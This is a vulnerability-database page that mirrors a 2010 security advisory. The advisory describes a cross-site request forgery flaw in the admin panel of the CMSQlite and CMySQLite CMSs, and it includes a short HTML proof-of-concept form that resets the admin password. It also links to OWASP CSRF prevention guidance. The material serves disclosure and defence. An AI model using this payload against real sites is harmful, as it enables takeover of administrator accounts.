Lucene search
K

CMSQlite & CMySQLite CSRF Vulnerability

🗓️ 28 Jun 2010 00:00:00Reported by ADEO SecurityType 
zdt
 zdt
🔗 0day.today👁 34 Views

CMSQlite & CMySQLite CSRF Vulnerability. Small, fast, flexible CMS basing on PHP and SQLite with admin panel CSRF vulnerabilitie

Code
=======================================
CMSQlite & CMySQLite CSRF Vulnerability
=======================================


# Title: CMSQlite & CMySQLite CSRF Vulnerability
# Author: ADEO Security
# Published: 28/06/2010
# Version: v1.3 >=
# Vendor: http://www.cmsqlite.net
 
# Description: "CMSQLite is a small, fast, flexible and complete
Content-Management-System (CMS).
It's perfect for freelancers, self-employeds, clubs and associations
and small companies.
CMSQLite is a CMS, basing on PHP and SQLite. That has many advantages!"
 
# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
([email protected])
 
# Vulnerabiliry:
CMSQlite and CMySQLite have CSRF vulnerabilites in the admin panel.
Attacker can change the password
of the admin. For secure your web applications against CSRF
vulnerabilities, look at this resources:
* OWASP-TR/WGT anticsurf Project - http://code.google.com/p/anticsurf/
* CSRF Prevention CS -
http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet
 
# PoC:
<html>
<body>
<form action="http://server/admin/helper/updateUser.php" method="POST">
<input type="hidden" name="userId" value="1">
<input type="hidden" name="userUsername" value="admin">
<input type="hidden" name="password1" value="csrfhits">
<input type="hidden" name="password2" value="csrfhits">
</form>
 
</body>
</html>



#  0day.today [2018-02-20]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Jun 2010 00:00Current
7.1High risk
Vulners AI Score7.1
34